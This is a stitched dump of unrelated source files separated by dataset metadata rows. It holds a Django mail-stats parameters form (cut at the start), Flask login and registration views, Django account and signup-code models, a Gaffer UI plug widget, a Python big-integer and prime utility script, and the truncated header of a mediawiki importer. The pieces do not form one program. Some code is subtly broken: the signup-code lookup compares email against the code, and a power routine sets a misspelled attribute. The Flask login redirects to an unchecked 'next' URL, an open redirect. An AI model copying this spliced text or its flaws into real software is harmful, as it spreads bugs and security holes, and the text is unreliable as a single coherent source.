from modoboa.parameters import forms as param_forms
class ParametersForm(param_forms.AdminParametersForm):
"""Stats global parameters."""
app = "modoboa_stats"
general_sep = form_utils.SeparatorField(label=ugettext_lazy("General"))
logfile = forms.CharField(
label=ugettext_lazy("Path to the log file"),
initial="/var/log/mail.log",
help_text=ugettext_lazy("Path to log file used to collect statistics"),
widget=forms.TextInput(attrs={"class": "form-control"})
)
rrd_rootdir = forms.CharField(
label=ugettext_lazy("Directory to store RRD files"),
initial="/tmp/modoboa",
help_text=ugettext_lazy(
"Path to directory where RRD files are stored"),
widget=forms.TextInput(attrs={"class": "form-control"})
)
greylist = form_utils.YesNoField(
label=ugettext_lazy("Show greylisted messages"),
initial=False,
help_text=ugettext_lazy(
"Differentiate between hard and soft rejects (greylisting)")
)
def __init__(self, *args, **kwargs):
"""Check RRDtool version."""
super(ParametersForm, self).__init__(*args, **kwargs)
rrd_version = parse_version(rrdtool.lib_version())
required_version = parse_version("1.6.0")
test_mode = getattr(settings, "RRDTOOL_TEST_MODE", False)
if rrd_version < required_version and not test_mode:
del self.fields["greylist"]
|
mit
| 6,087,176,765,779,094,000
| 32.156863
| 79
| 0.66233
| false
| 3.87844
| false
| false
| false
|
bigzhao/flask-projects-manage
|
app/auth/views.py
|
1
|
2830
|
# -*- coding: utf-8 -*-
from flask import render_template, redirect, request, url_for, flash
from flask.ext.login import login_user, logout_user, login_required, current_user
from . import auth
from ..models import User
from .forms import RegisterForm, EditForm, ChangePasswdForm
from .. import db
@auth.route('/login', methods=['GET', 'POST'])
def login():
if current_user.is_authenticated:
return redirect(url_for("main.index"))
if request.method == 'POST':
user = User.query.filter_by(id=request.form.get('uid')).first()
if user is not None and user.verify_password(request.form.get('password')):
login_user(user, request.form.get('remember_me'))
return redirect(request.args.get('next') or url_for('main.index'))
flash(u'错误的用户名或密码.')
return render_template('auth/login.html')
@auth.route('/logout')
@login_required
def logout():
logout_user()
flash('You have been logged out.')
return redirect(url_for('main.index'))
@auth.route('/register', methods=['POST', 'GET'])
def register():
if current_user.is_authenticated:
return redirect(url_for("main.index"))
form = RegisterForm()
if form.validate_on_submit():
user = User(id=form.uid.data,
name=form.username.data.strip(),
password=form.password.data)
db.session.add(user)
db.session.commit()
flash(u'注册成功!')
return redirect(url_for(".login"))
return render_template('auth/register.html', form=form)
@auth.route('/edit_profile', methods=['POST', 'GET'])
@login_required
def edit_profile():
form = EditForm()
if form.validate_on_submit():
user = current_user._get_current_object()
user.name = form.username.data
db.session.add(user)
db.session.commit()
flash(u'用户名修改成功')
return redirect(url_for('main.index'))
form.uid.data = current_user.id
form.username.data = current_user.name
return render_template('auth/edit_profile.html', form=form)
@auth.route('/changepasswd', methods=['POST', 'GET'])
@login_required
def change_passwd():
form = ChangePasswdForm()
if form.validate_on_submit():
if current_user.verify_password(form.old_password.data):
user = current_user._get_current_object()
user.password = form.password.data
db.session.add(user)
db.session.commit()
return redirect(url_for('auth.login'))
else:
flash(u'密码错误')
return render_template('auth/change_passwd.html', form=form)
def allowed_file(filename):
'''
判断文件格式
'''
return '.' in filename and \
filename.rsplit('.', 1)[1] in set(['png', 'jpg', 'jpeg', 'gif'])
|
mit
| 6,027,085,668,962,736,000
| 29.43956
| 83
| 0.625632
| false
| 3.542199
| false
| false
| false
|
Tamriel/wagtail_room_booking
|
account/models.py
|
1
|
13705
|
from __future__ import unicode_literals
import datetime
import operator
try:
from urllib.parse import urlencode
except ImportError: # python 2
from urllib import urlencode
from django.core.urlresolvers import reverse
from django.db import models, transaction
from django.db.models import Q
from django.db.models.signals import post_save
from django.dispatch import receiver
from django.utils import timezone, translation, six
from django.utils.encoding import python_2_unicode_compatible
from django.utils.translation import ugettext_lazy as _
from django.contrib.auth.models import AnonymousUser
from django.contrib.sites.models import Site
import pytz
from account import signals
from account.conf import settings
from account.fields import TimeZoneField
from account.hooks import hookset
from account.managers import EmailAddressManager, EmailConfirmationManager
from account.signals import signup_code_sent, signup_code_used
@python_2_unicode_compatible
class Account(models.Model):
user = models.OneToOneField(settings.AUTH_USER_MODEL, related_name="account", verbose_name=_("user"))
street = models.CharField(
_("street"),
max_length=100,
)
phone = models.CharField(
_("phone"),
max_length=100,
)
plz_city = models.CharField(
_("plz_city"),
max_length=100,
)
@classmethod
def for_request(cls, request):
user = getattr(request, "user", None)
if user and user.is_authenticated():
try:
return Account._default_manager.get(user=user)
except Account.DoesNotExist:
pass
return AnonymousAccount(request)
@classmethod
def create(cls, request=None, **kwargs):
create_email = kwargs.pop("create_email", True)
confirm_email = kwargs.pop("confirm_email", None)
account = cls(**kwargs)
if "language" not in kwargs:
if request is None:
account.language = settings.LANGUAGE_CODE
else:
account.language = translation.get_language_from_request(request, check_path=True)
account.save()
if create_email and account.user.email:
kwargs = {"primary": True}
if confirm_email is not None:
kwargs["confirm"] = confirm_email
EmailAddress.objects.add_email(account.user, account.user.email, **kwargs)
return account
def __str__(self):
return str(self.user)
def now(self):
"""
Returns a timezone aware datetime localized to the account's timezone.
"""
now = datetime.datetime.utcnow().replace(tzinfo=pytz.timezone("UTC"))
timezone = settings.TIME_ZONE if not self.timezone else self.timezone
return now.astimezone(pytz.timezone(timezone))
def localtime(self, value):
"""
Given a datetime object as value convert it to the timezone of
the account.
"""
timezone = settings.TIME_ZONE if not self.timezone else self.timezone
if value.tzinfo is None:
value = pytz.timezone(settings.TIME_ZONE).localize(value)
return value.astimezone(pytz.timezone(timezone))
@receiver(post_save, sender=settings.AUTH_USER_MODEL)
def user_post_save(sender, **kwargs):
"""
After User.save is called we check to see if it was a created user. If so,
we check if the User object wants account creation. If all passes we
create an Account object.
We only run on user creation to avoid having to check for existence on
each call to User.save.
"""
user, created = kwargs["instance"], kwargs["created"]
disabled = getattr(user, "_disable_account_creation", not settings.ACCOUNT_CREATE_ON_SAVE)
if created and not disabled:
Account.create(user=user)
@python_2_unicode_compatible
class AnonymousAccount(object):
def __init__(self, request=None):
self.user = AnonymousUser()
self.timezone = settings.TIME_ZONE
if request is None:
self.language = settings.LANGUAGE_CODE
else:
self.language = translation.get_language_from_request(request, check_path=True)
def __str__(self):
return "AnonymousAccount"
@python_2_unicode_compatible
class SignupCode(models.Model):
class AlreadyExists(Exception):
pass
class InvalidCode(Exception):
pass
code = models.CharField(_("code"), max_length=64, unique=True)
max_uses = models.PositiveIntegerField(_("max uses"), default=0)
expiry = models.DateTimeField(_("expiry"), null=True, blank=True)
inviter = models.ForeignKey(settings.AUTH_USER_MODEL, null=True, blank=True)
email = models.EmailField(max_length=254, blank=True)
notes = models.TextField(_("notes"), blank=True)
sent = models.DateTimeField(_("sent"), null=True, blank=True)
created = models.DateTimeField(_("created"), default=timezone.now, editable=False)
use_count = models.PositiveIntegerField(_("use count"), editable=False, default=0)
class Meta:
verbose_name = _("signup code")
verbose_name_plural = _("signup codes")
def __str__(self):
if self.email:
return "{0} [{1}]".format(self.email, self.code)
else:
return self.code
@classmethod
def exists(cls, code=None, email=None):
checks = []
if code:
checks.append(Q(code=code))
if email:
checks.append(Q(email=code))
if not checks:
return False
return cls._default_manager.filter(six.moves.reduce(operator.or_, checks)).exists()
@classmethod
def create(cls, **kwargs):
email, code = kwargs.get("email"), kwargs.get("code")
if kwargs.get("check_exists", True) and cls.exists(code=code, email=email):
raise cls.AlreadyExists()
expiry = timezone.now() + datetime.timedelta(hours=kwargs.get("expiry", 24))
if not code:
code = hookset.generate_signup_code_token(email)
params = {
"code": code,
"max_uses": kwargs.get("max_uses", 0),
"expiry": expiry,
"inviter": kwargs.get("inviter"),
"notes": kwargs.get("notes", "")
}
if email:
params["email"] = email
return cls(**params)
@classmethod
def check_code(cls, code):
try:
signup_code = cls._default_manager.get(code=code)
except cls.DoesNotExist:
raise cls.InvalidCode()
else:
if signup_code.max_uses and signup_code.max_uses <= signup_code.use_count:
raise cls.InvalidCode()
else:
if signup_code.expiry and timezone.now() > signup_code.expiry:
raise cls.InvalidCode()
else:
return signup_code
def calculate_use_count(self):
self.use_count = self.signupcoderesult_set.count()
self.save()
def use(self, user):
"""
Add a SignupCode result attached to the given user.
"""
result = SignupCodeResult()
result.signup_code = self
result.user = user
result.save()
signup_code_used.send(sender=result.__class__, signup_code_result=result)
def send(self, **kwargs):
protocol = getattr(settings, "DEFAULT_HTTP_PROTOCOL", "http")
current_site = kwargs["site"] if "site" in kwargs else Site.objects.get_current()
if "signup_url" not in kwargs:
signup_url = "{0}://{1}{2}?{3}".format(
protocol,
current_site.domain,
reverse("account_signup"),
urlencode({"code": self.code})
)
else:
signup_url = kwargs["signup_url"]
ctx = {
"signup_code": self,
"current_site": current_site,
"signup_url": signup_url,
}
ctx.update(kwargs.get("extra_ctx", {}))
hookset.send_invitation_email([self.email], ctx)
self.sent = timezone.now()
self.save()
signup_code_sent.send(sender=SignupCode, signup_code=self)
class SignupCodeResult(models.Model):
signup_code = models.ForeignKey(SignupCode)
user = models.ForeignKey(settings.AUTH_USER_MODEL)
timestamp = models.DateTimeField(default=timezone.now)
def save(self, **kwargs):
super(SignupCodeResult, self).save(**kwargs)
self.signup_code.calculate_use_count()
@python_2_unicode_compatible
class EmailAddress(models.Model):
user = models.ForeignKey(settings.AUTH_USER_MODEL)
email = models.EmailField(max_length=254, unique=settings.ACCOUNT_EMAIL_UNIQUE)
verified = models.BooleanField(_("verified"), default=False)
primary = models.BooleanField(_("primary"), default=False)
objects = EmailAddressManager()
class Meta:
verbose_name = _("email address")
verbose_name_plural = _("email addresses")
if not settings.ACCOUNT_EMAIL_UNIQUE:
unique_together = [("user", "email")]
def __str__(self):
return "{0} ({1})".format(self.email, self.user)
def set_as_primary(self, conditional=False):
old_primary = EmailAddress.objects.get_primary(self.user)
if old_primary:
if conditional:
return False
old_primary.primary = False
old_primary.save()
self.primary = True
self.save()
self.user.email = self.email
self.user.save()
return True
def send_confirmation(self, **kwargs):
confirmation = EmailConfirmation.create(self)
confirmation.send(**kwargs)
return confirmation
def change(self, new_email, confirm=True):
"""
Given a new email address, change self and re-confirm.
"""
with transaction.atomic():
self.user.email = new_email
self.user.save()
self.email = new_email
self.verified = False
self.save()
if confirm:
self.send_confirmation()
@python_2_unicode_compatible
class EmailConfirmation(models.Model):
email_address = models.ForeignKey(EmailAddress)
created = models.DateTimeField(default=timezone.now)
sent = models.DateTimeField(null=True)
key = models.CharField(max_length=64, unique=True)
objects = EmailConfirmationManager()
class Meta:
verbose_name = _("email confirmation")
verbose_name_plural = _("email confirmations")
def __str__(self):
return "confirmation for {0}".format(self.email_address)
@classmethod
def create(cls, email_address):
key = hookset.generate_email_confirmation_token(email_address.email)
return cls._default_manager.create(email_address=email_address, key=key)
def key_expired(self):
expiration_date = self.sent + datetime.timedelta(days=settings.ACCOUNT_EMAIL_CONFIRMATION_EXPIRE_DAYS)
return expiration_date <= timezone.now()
key_expired.boolean = True
def confirm(self):
if not self.key_expired() and not self.email_address.verified:
email_address = self.email_address
email_address.verified = True
email_address.set_as_primary(conditional=True)
email_address.save()
signals.email_confirmed.send(sender=self.__class__, email_address=email_address)
return email_address
def send(self, **kwargs):
current_site = kwargs["site"] if "site" in kwargs else Site.objects.get_current()
protocol = getattr(settings, "DEFAULT_HTTP_PROTOCOL", "http")
activate_url = "{0}://{1}{2}".format(
protocol,
current_site.domain,
reverse(settings.ACCOUNT_EMAIL_CONFIRMATION_URL, args=[self.key])
)
ctx = {
"email_address": self.email_address,
"user": self.email_address.user,
"activate_url": activate_url,
"current_site": current_site,
"key": self.key,
}
hookset.send_confirmation_email([self.email_address.email], ctx)
self.sent = timezone.now()
self.save()
signals.email_confirmation_sent.send(sender=self.__class__, confirmation=self)
class AccountDeletion(models.Model):
user = models.ForeignKey(settings.AUTH_USER_MODEL, null=True, blank=True, on_delete=models.SET_NULL)
email = models.EmailField(max_length=254)
date_requested = models.DateTimeField(_("date requested"), default=timezone.now)
date_expunged = models.DateTimeField(_("date expunged"), null=True, blank=True)
class Meta:
verbose_name = _("account deletion")
verbose_name_plural = _("account deletions")
@classmethod
def expunge(cls, hours_ago=None):
if hours_ago is None:
hours_ago = settings.ACCOUNT_DELETION_EXPUNGE_HOURS
before = timezone.now() - datetime.timedelta(hours=hours_ago)
count = 0
for account_deletion in cls.objects.filter(date_requested__lt=before, user__isnull=False):
settings.ACCOUNT_DELETION_EXPUNGE_CALLBACK(account_deletion)
account_deletion.date_expunged = timezone.now()
account_deletion.save()
count += 1
return count
@classmethod
def mark(cls, user):
account_deletion, created = cls.objects.get_or_create(user=user)
account_deletion.email = user.email
account_deletion.save()
settings.ACCOUNT_DELETION_MARK_CALLBACK(account_deletion)
return account_deletion
|
gpl-3.0
| 7,228,095,418,603,898,000
| 34.505181
| 110
| 0.624954
| false
| 4.1305
| false
| false
| false
|
appleseedhq/gaffer
|
python/GafferUI/CompoundDataPlugValueWidget.py
|
1
|
9030
|
##########################################################################
#
# Copyright (c) 2012, John Haddon. All rights reserved.
# Copyright (c) 2013, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with
# the distribution.
#
# * Neither the name of John Haddon nor the names of
# any other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
import functools
import imath
import IECore
import Gaffer
import GafferUI
## Supported plug metadata :
#
# "compoundDataPlugValueWidget:editable"
class CompoundDataPlugValueWidget( GafferUI.PlugValueWidget ) :
def __init__( self, plug, **kw ) :
self.__column = GafferUI.ListContainer( spacing = 6 )
GafferUI.PlugValueWidget.__init__( self, self.__column, plug, **kw )
with self.__column :
self.__layout = GafferUI.PlugLayout( plug )
with GafferUI.ListContainer( GafferUI.ListContainer.Orientation.Horizontal ) as self.__editRow :
GafferUI.Spacer( imath.V2i( GafferUI.PlugWidget.labelWidth(), 1 ) )
GafferUI.MenuButton(
image = "plus.png",
hasFrame = False,
menu = GafferUI.Menu( Gaffer.WeakMethod( self.__addMenuDefinition ) )
)
GafferUI.Spacer( imath.V2i( 1 ), imath.V2i( 999999, 1 ), parenting = { "expand" : True } )
self._updateFromPlug()
def hasLabel( self ) :
return True
def setPlug( self, plug ) :
GafferUI.PlugValueWidget.setPlug( self, plug )
self.__layout = GafferUI.PlugLayout( plug )
self.__column[0] = self.__layout
def setReadOnly( self, readOnly ) :
if readOnly == self.getReadOnly() :
return
GafferUI.PlugValueWidget.setReadOnly( self, readOnly )
self.__layout.setReadOnly( readOnly )
def childPlugValueWidget( self, childPlug, lazy=True ) :
return self.__layout.plugValueWidget( childPlug, lazy )
def _updateFromPlug( self ) :
editable = True
readOnly = False
if self.getPlug() is not None :
editable = Gaffer.Metadata.value( self.getPlug(), "compoundDataPlugValueWidget:editable" )
editable = editable if editable is not None else True
readOnly = Gaffer.MetadataAlgo.readOnly( self.getPlug() )
self.__editRow.setVisible( editable )
self.__editRow.setEnabled( not readOnly )
def __addMenuDefinition( self ) :
result = IECore.MenuDefinition()
result.append( "/Add/Bool", { "command" : functools.partial( Gaffer.WeakMethod( self.__addItem ), "", IECore.BoolData( False ) ) } )
result.append( "/Add/Float", { "command" : functools.partial( Gaffer.WeakMethod( self.__addItem ), "", IECore.FloatData( 0 ) ) } )
result.append( "/Add/Int", { "command" : functools.partial( Gaffer.WeakMethod( self.__addItem ), "", IECore.IntData( 0 ) ) } )
result.append( "/Add/NumericDivider", { "divider" : True } )
result.append( "/Add/String", { "command" : functools.partial( Gaffer.WeakMethod( self.__addItem ), "", IECore.StringData( "" ) ) } )
result.append( "/Add/StringDivider", { "divider" : True } )
result.append( "/Add/V2i/Vector", { "command" : functools.partial( Gaffer.WeakMethod( self.__addItem ), "", IECore.V2iData( imath.V2i( 0 ), IECore.GeometricData.Interpretation.Vector ) ) } )
result.append( "/Add/V2i/Normal", { "command" : functools.partial( Gaffer.WeakMethod( self.__addItem ), "", IECore.V2iData( imath.V2i( 0 ), IECore.GeometricData.Interpretation.Normal ) ) } )
result.append( "/Add/V2i/Point", { "command" : functools.partial( Gaffer.WeakMethod( self.__addItem ), "", IECore.V2iData( imath.V2i( 0 ), IECore.GeometricData.Interpretation.Point ) ) } )
result.append( "/Add/V3i/Vector", { "command" : functools.partial( Gaffer.WeakMethod( self.__addItem ), "", IECore.V3iData( imath.V3i( 0 ), IECore.GeometricData.Interpretation.Vector ) ) } )
result.append( "/Add/V3i/Normal", { "command" : functools.partial( Gaffer.WeakMethod( self.__addItem ), "", IECore.V3iData( imath.V3i( 0 ), IECore.GeometricData.Interpretation.Normal ) ) } )
result.append( "/Add/V3i/Point", { "command" : functools.partial( Gaffer.WeakMethod( self.__addItem ), "", IECore.V3iData( imath.V3i( 0 ), IECore.GeometricData.Interpretation.Point ) ) } )
result.append( "/Add/V2f/Vector", { "command" : functools.partial( Gaffer.WeakMethod( self.__addItem ), "", IECore.V2fData( imath.V2f( 0 ), IECore.GeometricData.Interpretation.Vector ) ) } )
result.append( "/Add/V2f/Normal", { "command" : functools.partial( Gaffer.WeakMethod( self.__addItem ), "", IECore.V2fData( imath.V2f( 0 ), IECore.GeometricData.Interpretation.Normal ) ) } )
result.append( "/Add/V2f/Point", { "command" : functools.partial( Gaffer.WeakMethod( self.__addItem ), "", IECore.V2fData( imath.V2f( 0 ), IECore.GeometricData.Interpretation.Point ) ) } )
result.append( "/Add/V3f/Vector", { "command" : functools.partial( Gaffer.WeakMethod( self.__addItem ), "", IECore.V3fData( imath.V3f( 0 ), IECore.GeometricData.Interpretation.Vector ) ) } )
result.append( "/Add/V3f/Normal", { "command" : functools.partial( Gaffer.WeakMethod( self.__addItem ), "", IECore.V3fData( imath.V3f( 0 ), IECore.GeometricData.Interpretation.Normal ) ) } )
result.append( "/Add/V3f/Point", { "command" : functools.partial( Gaffer.WeakMethod( self.__addItem ), "", IECore.V3fData( imath.V3f( 0 ), IECore.GeometricData.Interpretation.Point ) ) } )
result.append( "/Add/VectorDivider", { "divider" : True } )
result.append( "/Add/Color3f", { "command" : functools.partial( Gaffer.WeakMethod( self.__addItem ), "", IECore.Color3fData( imath.Color3f( 0 ) ) ) } )
result.append( "/Add/Color4f", { "command" : functools.partial( Gaffer.WeakMethod( self.__addItem ), "", IECore.Color4fData( imath.Color4f( 0, 0, 0, 1 ) ) ) } )
result.append( "/Add/BoxDivider", { "divider" : True } )
result.append( "/Add/Box2i", { "command" : functools.partial( Gaffer.WeakMethod( self.__addItem ), "", IECore.Box2iData( imath.Box2i( imath.V2i( 0 ), imath.V2i( 1 ) ) ) ) } )
result.append( "/Add/Box2f", { "command" : functools.partial( Gaffer.WeakMethod( self.__addItem ), "", IECore.Box2fData( imath.Box2f( imath.V2f( 0 ), imath.V2f( 1 ) ) ) ) } )
result.append( "/Add/Box3i", { "command" : functools.partial( Gaffer.WeakMethod( self.__addItem ), "", IECore.Box3iData( imath.Box3i( imath.V3i( 0 ), imath.V3i( 1 ) ) ) ) } )
result.append( "/Add/Box3f", { "command" : functools.partial( Gaffer.WeakMethod( self.__addItem ), "", IECore.Box3fData( imath.Box3f( imath.V3f( 0 ), imath.V3f( 1 ) ) ) ) } )
result.append( "/Add/BoxDivider", { "divider" : True } )
for label, plugType in [
( "Float", Gaffer.FloatVectorDataPlug ),
( "Int", Gaffer.IntVectorDataPlug),
( "NumericDivider", None ),
( "String", Gaffer.StringVectorDataPlug ),
] :
if plugType is not None :
result.append( "/Add/Array/" + label, {"command" : IECore.curry( Gaffer.WeakMethod( self.__addItem ), "", plugType.ValueType() ) } )
else :
result.append( "/Add/Array/" + label, { "divider" : True } )
return result
def __addItem( self, name, value ) :
with Gaffer.UndoScope( self.getPlug().ancestor( Gaffer.ScriptNode ) ) :
self.getPlug().addChild( Gaffer.NameValuePlug( name, value, True, "member1", flags = Gaffer.Plug.Flags.Default | Gaffer.Plug.Flags.Dynamic ) )
GafferUI.PlugValueWidget.registerType( Gaffer.CompoundDataPlug, CompoundDataPlugValueWidget )
##########################################################################
# Plug metadata
##########################################################################
Gaffer.Metadata.registerValue( Gaffer.CompoundDataPlug, "*", "deletable", lambda plug : plug.getFlags( Gaffer.Plug.Flags.Dynamic ) )
|
bsd-3-clause
| 551,014,885,235,974,460
| 50.306818
| 192
| 0.670764
| false
| 3.356877
| false
| false
| false
|
bobismijnnaam/bobe-euler
|
48/Utils.py
|
1
|
12422
|
#!/usr/bin/env python3
import collections
# skim seems to be intensive and doing a lot of work even though in some
# cases it could do less. For example, in add, you can stop skimming if after
# skimming the first two cells the carrier is 0.
# we need more kinds of skimming, at least two (i.e. the skim as we know it
# now for extreme cases, and a skim that I just described to cover cases
# where we now after topping off one time we now there are no others.)
class BigInt:
def __init__(self):
self.number = [0]
def skim(self):
carrier = 0
for i in range(len(self.number)):
self.number[i] += carrier
head = self.number[i] % 10
carrier = (self.number[i] - head) / 10
self.number[i] = int(head)
while carrier != 0:
head = carrier % 10
carrier = (carrier - head) / 10
self.number.append(int(head))
def add(self, factor):
self.number[0] += factor
self.skim();
def mul(self, factor):
carry = 0
for i in range(len(self.number)):
self.number[i] *= factor
self.number[i] += carry
carry = 0
if self.number[i] > 9:
head = int(self.number[i] % 10)
carry = int((self.number[i] - head) / 10)
self.number[i] = head
while carry != 0:
head = carry % 10
carry = (carry - head) / 10
self.number.append(int(head))
def pow(self, factor):
if factor < 0:
raise NotImplementedError("Negative powers not supported")
if type(factor) == type(0.1) and not factor.is_integer():
raise NotImplementedError("Non-integer powers not supported")
if factor == 0:
self.numbers = [1]
return
oldSelf = self.clone()
for _ in range(factor - 1):
self.bigMul(oldSelf)
def smartPow(self, factor):
# Inspired by: https://en.wikipedia.org/wiki/Exponentiation_by_squaring
if factor < 0:
raise NotImplementedError("Negative powers not supported")
if type(factor) == type(0.1) and not factor.is_integer():
raise NotImplementedError("Non-integer powers not supported")
if factor == 0:
self.numbers = [1]
return
if factor == 1:
return
if (factor % 2) == 0:
# Even
self.bigMul(self)
self.smartPow(factor / 2)
else:
# Odd
oldSelf = self.clone()
self.bigMul(self)
self.smartPow((factor - 1) / 2)
self.bigMul(oldSelf)
def smartPowIt(self, factor):
# Inspired by: https://en.wikipedia.org/wiki/Exponentiation_by_squaring
if factor < 0:
raise NotImplementedError("Negative powers not supported")
if type(factor) == type(0.1) and not factor.is_integer():
raise NotImplementedError("Non-integer powers not supported")
if factor == 0:
self.numbers = [1]
return
if factor == 1:
return
y = BigInt()
y.add(1)
while factor > 1:
if (factor % 2) == 0:
# Even
self.bigMul(self)
factor /= 2
else:
# Odd
y.bigMul(self)
self.bigMul(self)
factor = (factor - 1) / 2
self.bigMul(y)
def skimOne(self, i):
if self.number[i] > 9:
old = self.number[i]
self.number[i] = int(old % 10)
head = int((old - (old % 10)) / 10)
if i + 1 < len(self.number):
self.number[i + 1] += head
else:
self.number.append(head)
def bigAdd(self, bigInt):
# TODO: Self add does not work!
if len(self.number) < len(bigInt.number):
self.number += [0] * (len(bigInt.number) - len(self.number))
for (i, v) in enumerate(bigInt.number):
self.number[i] += bigInt.number[i]
self.skimOne(i)
# TODO: Bottleneck for smartpow is here!
# self.skim()
def bigMul(self, bigFactor):
# We can take the internal list because we construct a new list
# (in total)
# So even if we multiply with self this should still work out
total = BigInt()
# For each factor...
for (i, v) in enumerate(bigFactor.number):
# If v is zero, skip it, because then the order should be skipped
if v == 0:
continue
# Make a copy of the original
digitSelf = self.clone()
# Shift it the amount of places of the current digit
digitSelf.shift(i)
# If v is more than zero, multiply
if v > 1:
digitSelf.mul(v)
total.bigAdd(digitSelf)
# Set the end result
self.number = total.number
def getNumberArray(self):
return list(self.number)
def toString(self):
result = ""
for i in self.number:
result += str(i)
return result[::-1]
def clone(self):
newSelf = BigInt()
newSelf.number = self.getNumberArray()
return newSelf
def shift(self, n):
if n == 0:
return
if n < 0:
raise NotImplementedError("Negative shifts are not yet implemented")
oldLen = len(self.number)
self.number += [0] * n
for i in range(len(self.number) - 1, n - 1, -1):
self.number[i] = self.number[i - n]
self.number[i - n] = 0
def take(self, n):
if n == 0:
self.number = [0]
if n < 0:
raise ValueError("Non-negative takes are not supported")
self.number = self.number[:n]
def generatePrimeTable(lim):
numbers = [True] * lim
numbers[0] = False
numbers[1] = False
currNum = 4
while currNum < lim:
numbers[currNum] = False
currNum += 2
prime = 3
while prime < lim:
if numbers[prime]:
currNum = prime
currNum += prime
while currNum < lim:
numbers[currNum] = False
currNum += prime
prime += 2
return numbers
class NumberJuggler:
def __init__(self, lim):
print("Generating prime lookup table")
self.primeTable = generatePrimeTable(lim)
print("Generating prime list")
self.primeList = [i for i, b in enumerate(self.primeTable) if b]
print("Finished initializing number juggler")
def getFactorization(self, num):
factorisation = collections.defaultdict(int)
countdown = num
for prime in self.primeList:
if countdown == 1: break
while countdown % prime == 0:
countdown = countdown // prime
factorisation[prime] += 1
return factorisation
def getFactors(self, num):
factorisation = self.getFactorization(num)
result = []
for k, v in factorisation.items():
result.extend([k] * v)
return result
def getPrimeFactors(self, num):
return list(self.getFactorization(num).keys())
def getDivisors(self, num):
if num == 1: return [1]
factorization = self.getFactorization(num)
factors = list(factorization.keys())
factorCounts = [0] * len(factors)
factorCounts[0] = 1
run = True
divisors = [1]
while run:
divisor = 1;
for j in range(0, len(factors)):
if factorCounts[j] != 0:
divisor *= factors[j]**factorCounts[j]
if divisor != num:
divisors.append(divisor)
factorCounts[0] += 1
for j in range(0, len(factorCounts)):
if factorCounts[j] == factorization[factors[j]] + 1:
if j == len(factorCounts) - 1:
run = False
break
else:
factorCounts[j] = 0;
factorCounts[j + 1] += 1
return divisors
def mergeSort(array):
if len(array) <= 1:
return array[:]
else:
mid = len(array) // 2
left = mergeSort(array[:mid])
right = mergeSort(array[mid:])
result = []
while len(left) > 0 and len(right) > 0:
if left[0] < right[0]:
result.append(left.pop(0))
else:
result.append(right.pop(0))
if len(left) > 0:
result.extend(left)
elif len(right) > 0:
result.extend(right)
return result
def removeDupsOrdered(array):
prev = array[0]
result = [prev]
for e in array[1:]:
if e != prev:
prev = e
result.append(e)
return result
def simplifyFraction(nj, numerator, denominator):
if denominator == 0:
return (0, 0)
if numerator == 0:
return (0, 0)
numFactors = nj.getFactors(numerator)
denFactors = nj.getFactors(denominator)
i = 0
while i < len(denFactors):
currFactor = denFactors[i]
if currFactor in denFactors and currFactor in numFactors:
denFactors.remove(currFactor)
numFactors.remove(currFactor)
else:
i += 1
newNumerator = 1
for f in numFactors:
newNumerator *= f
newDenominator = 1
for f in denFactors:
newDenominator *= f
return (newNumerator, newDenominator)
def isPandigital(num):
numStr = str(num)
seen = [False] * len(numStr)
total = 0
for c in numStr:
cInt = int(c)
if cInt < 1 or cInt > len(numStr):
total = -1
break
if not seen[cInt - 1]:
total += 1
seen[cInt - 1] = True
else:
total = -1
break
return total == len(numStr)
def generatePermutations(elements):
allPerms = []
if len(elements) == 1:
return [elements]
for i in range(0, len(elements)):
lessElements = list(elements)
del lessElements[i]
partialPerms = generatePermutations(lessElements)
for perm in partialPerms:
allPerms.append([elements[i]] + perm)
return allPerms
if __name__ == "__main__":
print("Unit testing!")
print("Tests for BigInt")
bi = BigInt()
bi.add(123)
assert(bi.toString() == "123")
bi.shift(3)
assert(bi.toString() == "123000")
bi = BigInt()
bi.add(50)
bi.mul(5)
# print(bi.toString())
assert(bi.toString() == "250")
ba = BigInt()
ba.add(200)
bb = BigInt()
bb.add(12345)
bb.bigAdd(ba)
assert(bb.toString() == str(12345 + 200))
ba = BigInt()
ba.add(12345)
bb = BigInt()
bb.add(67890)
bb.bigMul(ba)
assert(bb.toString() == str(12345 * 67890))
ba = BigInt()
ba.add(3)
bb = BigInt()
bb.add(3)
ba.bigMul(bb)
ba.bigMul(bb)
assert(ba.toString() == "27")
bi = BigInt()
bi.add(3)
bi.pow(3)
assert(bi.toString() == "27")
bi = BigInt()
bi.add(80)
bi.pow(80)
assert(bi.toString() == str(80 ** 80))
bi = BigInt()
bi.add(3)
bi.smartPow(3)
assert(bi.toString() == "27")
bi = BigInt()
bi.add(80)
bi.smartPow(80)
assert(bi.toString() == str(80 ** 80))
bi = BigInt()
bi.add(3)
bi.smartPowIt(3)
assert(bi.toString() == "27")
bi = BigInt()
bi.add(80)
bi.smartPowIt(80)
assert(bi.toString() == str(80 ** 80))
|
mit
| 5,004,734,104,982,722,000
| 24.096639
| 80
| 0.495089
| false
| 3.957311
| false
| false
| false
|
projectgus/yamdwe
|
mediawiki.py
|
1
|
7964
|
"""
Methods for importing mediawiki pages, images via the simplemediawki
wrapper to the MediaWiki API.
Copyright (C) 2014 Angus Gratton
